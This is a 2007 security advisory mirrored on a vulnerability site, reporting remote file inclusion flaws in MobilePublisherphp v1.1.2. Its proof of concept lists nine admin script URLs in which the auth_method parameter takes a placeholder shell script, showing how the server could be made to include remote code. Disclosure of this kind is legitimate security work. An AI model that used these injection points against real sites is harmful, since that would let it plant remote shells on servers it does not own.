Computer Security

Security Advisory: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Sitebar 3.3.5 (index.php writerFile)Remote
File Include Vulnerabilities

  Pixaria Gallery 1.0 (class.Smarty.
php) Remote File Include Vulnerability

  Back-End CMS Database Tables v0.4.7 Cross Site Scripting

  bloofoxCMS 0.2.2 Cross Site Scripting

From:the_3dit0r_(at)_yahoo.com <the_3dit0r_(at)_yahoo.com>
Date:16.04.2007
Subject:MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities

""""""""""""""
""""""""""""""
""""""""""""""
"""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
""""""""""""""
""""""""""""""
""""""""""""""
"""""
  Xmor$ Security Vulnerability Research TM


# Tilte:  MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities


# Author..................: [the_Edit0r]
# HomePage ...............: [Www.XmorS-sEcurity.coM]
# Location ...............: [Iran]
# Software ...............: [MobilePublisherphp]
# Impact..................: [ Remote ]
# Site Script ............: [http://sourceforge.net/projects/mpphp/]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]





------------------------------- proof Of Concept ---------------------------



www.example.com/[path]/admin/index.php?auth_method=[Shell-Script]
www.example.com/[path]/admin/list.php?auth_method=[Shell-Script]
www.example.com/[path]/admin/postreview.php?auth_method=[Shell-Script]
www.example.com/[path]/admin/reindex.php?auth_method=[Shell-Script]
www.example.com/[path]/admin/sections.php?auth_method=[Shell-Script]
www.example.com/[path]/admin/templates.php?auth_method=[Shell-Script]
www.example.com/[path]/admin/userinfo.php?auth_method=[Shell-Script]
www.example.com/[path]/admin/users.php?auth_method=[Shell-Script]
www.example.com/[path]/admin/view.php?auth_method=[Shell-Script]


----------------------------------------------------------------------------





# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru